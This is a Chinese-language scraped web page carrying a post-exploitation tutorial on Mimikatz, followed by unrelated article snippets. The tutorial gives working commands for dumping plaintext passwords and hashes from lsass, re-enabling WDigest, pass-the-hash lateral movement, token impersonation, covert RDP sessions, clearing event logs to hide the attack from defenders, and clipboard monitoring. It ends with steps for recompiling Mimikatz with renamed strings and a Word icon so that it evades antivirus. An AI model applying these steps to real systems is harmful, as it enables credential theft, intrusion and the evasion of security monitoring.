范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

内网渗透之某后渗透利用

  0x01 工具介绍工具原理
  Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于 lsass.exe  进程的内存当中,Mimikatz 通过注入lsass.exe  进程读取进程内存,从中获取对应的明文密码。常见问题
  在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest "UseLogonCredential"(DWORD)
  后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。 reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1
  给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以
  【一帮助网络安全学习一】关注我,私信回复"资料"免费领取256G网络安全自学资料 0x02 基础使用常见用法
  Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为 /usr/share/mimikatz  ,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。privilege::debug sekurlsa::logonpasswords
  也可以使用一句话输出保存 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt基本语法
  使用命令可查看全部功能模块 ::
  调试进程修改运行权限为 SYSTEM  privilege::debug privilege:: #查看 privilege 的运行模块
  开启日志记录,保存读取的用户凭证信息 standard::log
  0x03 常用模块Crypto模块
  加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:
  /provider #指定提供者
  /providertype #指定提供类型
  /cngprovider #CNG提供者
  /export #导出密钥 PVK 文件
  查看相关密钥的提供者 crypto::providers
  查看当前系统存储信息 crypto::stores
  常见的系统存储用户名包括: CURRENT_USER USER_GROUP_POLICY LOCAL_MACHINE LOCAL_MACHINE_GROUP LOCAL_MACHINE_ENTERPRISE CURRENT_SERVICE USERS SERVICES
  指定系统存储为 local_machine  进行查看crypto::stores /systemstore:local_machine
  查看用户当前证书 crypto::certificates
  导出 ROOT 根证书 crypto::certificates /store:Root
  导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz crypto::certificates /store:Root /export
  使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打 crypto::capi
  使用 CNG 打补丁,用于导出未标记可导出的证书 crypto::cng
  列出智能读卡器,可能会出现报错 crypto::sc
  查看相关密钥 crypto::key
  使用 OpenSSL 生成证书 openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块
  Sekurlsa 模块能从 lsass.exe  进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码sekurlsa::logonpasswords
  查看用户哈希可能会出现报错,这主要是由于当前权限较低 lsadump::sam
  解决方法非常简单,只要以系统权限运行即可 process::runp
  在新窗口中再次运行可成功拿到哈希
  重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录 lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637
  转储并导出 lsass.exe  进程sekurlsa::minidump lsass.tmp
  通过哈希传递进行横向移动 sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637 sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637
  凭证管理器中可查看 Windows 凭证
  Token模块
  Token 模块主要用于查看、假冒现有 token。查看当前 token 信息 token::whoami
  查看 token 列表并假冒系统管理员 token::list token::elevate /NT AUTHORITYSYSTEM
  还原假冒进程 token::revert
  其他模块
  一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录
  配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户 ts::multirdp
  成功登录原会话不受影响,使用命令查看会话列表 ts::sessions
  虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志
  使用命令一键清除日志 event::clear
  成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程
  安装/卸载 Mimikatz 服务,帮助我们监听用户输入 service::+ service::-
  成功安装 Mimikatz 服务且已自动启动
  比如监听粘贴文本 misc::clip
  0x04 免杀利用
  Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。 准备环境
  在免杀前需要准备以下三个要素: Mimikatz 源码 Visual Stdio 2019(C++) vc依赖文件
  在 Github 中下载最新版的 Mimikatz
  下载地址:https://github.com/gentilkiwi/mimikatz
  更新 360 杀毒、病毒库为最新版本
  配置问题
  点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。
  选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题
  下载安装完成后修改手工工具集为 2017 版本
  在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译
  重新生成又出现报错:MSB8036
  在项目属性页选择已安装的 SDK 版本
  点击重新生成后成功编译 32 位 Mimikatz
  如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64
  点击重新生成成功编译 64 位 Mimikatz
  免杀过程
  步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换
  把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可
  由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec
  点击重新生成后输出 macsec.exe
  虽然目前能够进行静态查杀,但是还是无法绕过动态查杀
  进一步删除 macsec.c  和macsec.h  的注释信息
  再次重新生成程序使用360测试仍无法绕过动态查杀
  在 macsec.rc  中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec
  修改图标 macsec.ico  为 Office Word 图标后再次点击生成
  放入免杀环境再次运行即可成功绕过
  当然命令也能够成功执行
  完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序
  【一帮助网络安全学习一】关注我,私信回复"资料"免费领取256G网络安全自学资料

我国发现首个深水深层气田,探明地质储量超过500亿立方米根据此前消息来看,2022年10月19日,中国海洋石油集团公布的信息来看,水下能源有了进一步的开发进展。我国现在已经发现了境内的首个深水深层大气田。此次发现也说明了我国在深海探测领传说中的ampampquot境界一直以来,有些自我感觉良好的东西,一旦别人也这么一夸,便自己就承认了!比如自己穿了一件漂亮的衣服,照镜子觉得自己感觉美了,万一有人一夸,这感觉就坐实了,以为自己就真是美!以前,我就华为员工的工资真的有传说中那么高吗?真实的收入是什么样的?一提到华为,首先是敬佩之情油然而生。2021年8月2日,财富公布世界500强榜单,华为排在第44位。2020中国民营企业500强,华为排在第1名。随之而来的就是对华为高薪的羡慕,舆调中降逆诸方特色配伍形式浊阴不降,是指中焦升降失调,胃气上逆的病变。调中降逆,是据浊阴不降病机拟定的治法。胃气上逆证候,有寒有热,有虚有实,临证组方,不可不审。呕吐由于胃气上逆,自然当以调气为先,治呕诸方注意!这5种蔬菜自带毒物,必须焯水才能吃中国烹饪贯穿南北,集百家之所长纵横东西,揽千味之精华重色香味形加营养丰富。经常做饭的人都知道,有些蔬菜因为特殊原因,做菜之前必须焯水,这样不仅能去除食物的异味,缩短烹饪时间,更重要核桃的功效及正确吃法核桃含有Omega3脂肪酸a亚麻酸植酸酶抑制剂叶酸维生素E多酚精氨酸赖氨酸甜菜碱等。核桃对皮肤大脑心血管系统都有好处,可以防止鳞状皮肤皮炎皮肤色素沉着,防止皮肤萎缩核桃中的精氨酸可科学家逆向工程将Starlink作为定位卫星精度最高可达1米美国德克萨斯大学奥斯汀分校的研究人员开发了一种新方法,可以使用Starlink充当定位卫星,以实现GPSGLONASSGalileo和北斗的功能。当Starlink处于早期发射阶段小米大佬的励志故事雷军雷军40岁生日的那天夜里,他和几位朋友到北京中关村当代商城附近的一家酒廊喝酒。酒过三巡,雷军感慨地说人是不克不及推着石头往山上走的,这样会很累,而且会被山上随时滚落的石头给打下用了5年的安卓终于退休了换上iPhone14pro一周后,聊聊我的体验灵动岛应该大家都很关心吧。我觉得这个,就是好看了一些,没啥特别大作用,就是播放音乐啊,手机来电啊会有显示,其他时候就是一个小药丸。偷偷说哦,新手机怎么让别人知道呢,就是灵动岛工作的投影抖4K详解随着投影仪价位的不断降低,投影仪也走进了家庭,于是网上4K投影仪的广告眼花缭乱,还出现抖4K的名词,是不是被抖晕了,什么是抖4K,它与原生态的4K区别在哪里?抖4K是怎么抖动出来的颜值在线,后摄跑马灯,中兴远航40Pro官宣10月26日发布10月21日,中兴手机官宣中兴远航40Pro正式开启预售,新机外观跟配置首次曝光中兴远航40Pro背后采用拼接式设计,玻璃AG工艺,一半浅蓝一半深蓝,7。6mm的机身,配色方面有青
为什么现在越来越多的人离不开手机,而电视是个摆饰?这个问题很有意思,现在手机上面的东西五花八门,可以选择自己喜欢的看或者是玩儿,电视毕竟选择范围面比较有限,另外手机有它的方便性随时可以拿出来看看玩儿玩儿的,这是我的认为不一定对。手你记忆中有哪些游戏主播一直坚守本心,即便平台没落也未曾离开?在这个时代一个人能够坚守本心,不论老东家如何对待自己也一直坚持下去的主播的确不多,在三旬记忆中最具有代表性的是以下几位TOP1大马猴旭旭宝宝虽然现在旭旭宝宝已经加盟斗鱼TV,但是相洋葱到底有哪些营养?洋葱是一种集营养医疗和保健于一身的特色蔬菜。其肥大的鳞茎中含糖8。5,干物质9。2,每100克含维生素A5毫克维生素C9。3毫克钙40毫克磷50毫克铁8毫克,以及18种氨基酸,是不为什么很多病人都脑梗了送到医院,医生还只是简单的拍个片输个液?大家好,我是一名内科医生,不知道大家发现没有,近年来很多医院都发生了翻天覆地的变化,医院的大门口院内地标走廊等都会醒目的写着胸痛中心卒中中心创伤中心。为什么要这么设置呢?足以可见这哪个牌子的护肤品祛斑效果好?说实在的,真正有效的祛斑产品都不便宜,祛斑要有持久战的心理准备,几年前的九朵云,马油价格实惠,几十块就买到了,事实证明是没用的,那是掩耳盗铃,九朵云就火了不到两年,这两年基本看不到皮肤暗沉该怎么办?改善发黄暗沉最简单也是最有效的方法抗氧化。抗氧化,英文AntiOxidant,全称是抗氧化自由基。氧化,是人体内每分每秒都在发生的事情。我们呼吸身体器官的运作对体内各种物质的运用处中国为什么拼命造路造高铁?要想富先修路,发展交通才能推动经济的发展,才能改善人们的生活,发展高铁不也涉及到科技的创新吗?中国发展高铁的设想起于上世纪90年代初,当时就在论证修建一条从北京到上海的高速铁路,9如果哈雷彗星再次回归时,人类刚好技术达到,可不可以将探测器装在哈雷彗星上?完全可以。哈雷彗星是太阳系内一颗短周期彗星,周期大约在76年,它的名字主要来源于英国物理学家爱德蒙哈雷,就是他首先测定出哈雷彗星的轨道数据,并准确的预言了哈雷彗星的回归。哈雷彗星是格力电器,中国平安股票为什么一路下跌?大家好,我是谦秋说,一个浸润资本市场19年的投资者。对于格力电器中国平安这样的绩优上市公司,为啥一路下跌,其实有内因,也有外因。那投资大师巴菲特的话来说,股票价格,短期来看是投票器有人说哈弗车费油为什么还有人买?这个问题很好回答,就像一个人饿了,1块钱馒头本来可以吃饱,但是那人喜欢拿2块钱吃包子一样,人的用车需求本身不同,适合自己才最重要,多花一点钱,换来更好的体验,不就是买车的初衷吗?此宜宾到西藏林芝怎么坐车?想到灵芝去玩,从宜宾出发,有很多方法可以过去,比如说坐火车,坐飞机,拼车,都可到达。当然,你想坐直达的汽车,可能没有,想坐直达的汽车,只能拼车过去,拼车的费用可能稍微高点。拼车怎么